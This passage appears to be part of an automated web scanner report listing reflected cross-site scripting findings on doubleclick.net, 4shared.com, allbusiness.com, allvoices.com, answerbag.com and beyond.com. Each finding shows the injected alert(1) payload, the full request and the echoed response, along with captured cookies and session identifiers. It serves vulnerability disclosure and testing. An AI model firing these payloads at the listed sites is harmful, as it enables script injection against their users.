Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:52 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
RtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...
6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d09c"-alert(1)-"9ece5572fb6 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:58:24 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:58:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/free-easy-webex-together.html%3FTrackID%3D1024048");
var fscUrl = url;
var fsc
...[SNIP]...
6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e478"-alert(1)-"cf73551e9d0 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:10 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...
6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de85f"-alert(1)-"20e7d43f519 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:17 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/1b7/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRl
...[SNIP]...
6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f45e'-alert(1)-'47a61c2d0ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f45e'-alert(1)-'47a61c2d0ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico3f45e'-alert(1)-'47a61c2d0ed
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1459F926DDE8BF905A4995BCC43D1519.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:12 GMT
Content-Length: 41850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.ico3f45e'-alert(1)-'47a61c2d0ed',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...
6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15164"-alert(1)-"dd8c6187af5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico15164"-alert(1)-"dd8c6187af5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico15164&quot;-alert(1)-&quot;dd8c6187af5
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=61CB2DAE3C41A134AF4364A8D421487B.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:11 GMT
Content-Length: 41151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico15164"-alert(1)-"dd8c6187af5";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...
6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e07"><script>alert(1)</script>fd9b551f005 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod2e07"><script>alert(1)</script>fd9b551f005 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1
ETag: "64d7e41dd2260249cada85edd9738f53"
X-Runtime: 121
Content-Length: 13392
Set-Cookie: logged_in=false; path=/
Set-Cookie: _aboutus_session_key=BAh7BzoPc2Vzc2lvbl9pZCIlMTY5MTgwMTgzNDlmM2ZmZGJkNzIwNmY4ZGRjOTlhNjEiDWFiX2luZGV4aSs%3D--b35a502024b9ad39567b1317c2a187f617c7104f; path=/; expires=Mon, 02-Apr-2012 13:43:11 GMT; HttpOnly
Cache-Control: max-age=0, public
X-Au-Rails-Sha1: 65ba32a
Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack)
X-node-id: rogue
Set-Cookie: SERVERID=rogue; path=/


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="description" content="Favicon.Icod2e07"><Script>Alert(1)</Script>Fd9b551f005 - Learn from the experts and community at AboutUs.org" />
...[SNIP]...
6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e888a"-alert(1)-"bb943823954 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e888a"-alert(1)-"bb943823954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=2a30daa2c5964f7e7295;path=/
Set-Cookie: SERVERID=web6;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: PAGEID=594366435;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A49%2E447;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:49 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
ot found, but...";
       s_ab.prop10 = "3471360";
       s_ab.prop11 = "";
       s_ab.prop12 = "landingpageobject";
       s_ab.prop13 = "AllBusiness.com";
       s_ab.prop14 = "";
       s_ab.prop15 = "www.allbusiness.com/e888a"-alert(1)-"bb943823954";
       s_ab.prop16 = "";
       s_ab.prop17 = "";
       s_ab.prop18 = "";
       s_ab.prop19 = "";
       s_ab.prop20 = "";
       s_ab.prop21 = "";
       s_ab.prop22 = "";
       s_ab.prop23 = "";
       s_ab.prop24 = "";
       s_ab.p
...[SNIP]...
6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 was submitted in the REST URL parameter 1. This input was echoed as c535f"><img src=a onerror=alert(1)>8e7e657d535 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=ac30c795cbb9533a1273;path=/
Set-Cookie: SERVERID=web7;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: PAGEID=594366418;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A47%2E92;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:47 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
<form method="post" id="formWrapper_1" name="formWrapper_1" action="https://www.allbusiness.com/c535f"><img src=a onerror=alert(1)>8e7e657d535?server=web7&sid=ac30c795cbb9533a1273">
...[SNIP]...
6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5dd6"><script>alert(1)</script>e219c4ca2fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 17ms
X-QueryRuntime: 0.00090
Cache-Control: no-cache
Set-Cookie: _T_=c2xmzossd34irl5oaei3kdcgc; path=/; expires=Sun, 03 Apr 2011 01:33:36 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Ffavicon.icoe5dd6%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee219c4ca2fb; path=/
Set-Cookie: masala_session_id=cc123cc7f9309ecd4fb448f3e3eaa04c; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb"/>
...[SNIP]...
6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1dcf8'><script>alert(1)</script>60b16937f0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:24:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=37e025c3a2f50dca596f6e4370459fb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b' />
...[SNIP]...
6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e was submitted in the REST URL parameter 1. This input was echoed as e5463 style=x:expression(alert(1)) fd7a74860e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoe5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beyond.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 30033
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=Beyond%2Ecom&NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=913263227153426286&USERCOUNTRY=US; expires=Sun, 01-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=7A3FD486%2D48A5%2D4EA0%2DB271%2D6C91FED7EA92; path=/
Set-Cookie: ASPSESSIONIDAQTRQBAR=KNFHENGDPLLKNBNCIIEGPDBD; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:03:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equ
...[SNIP]...
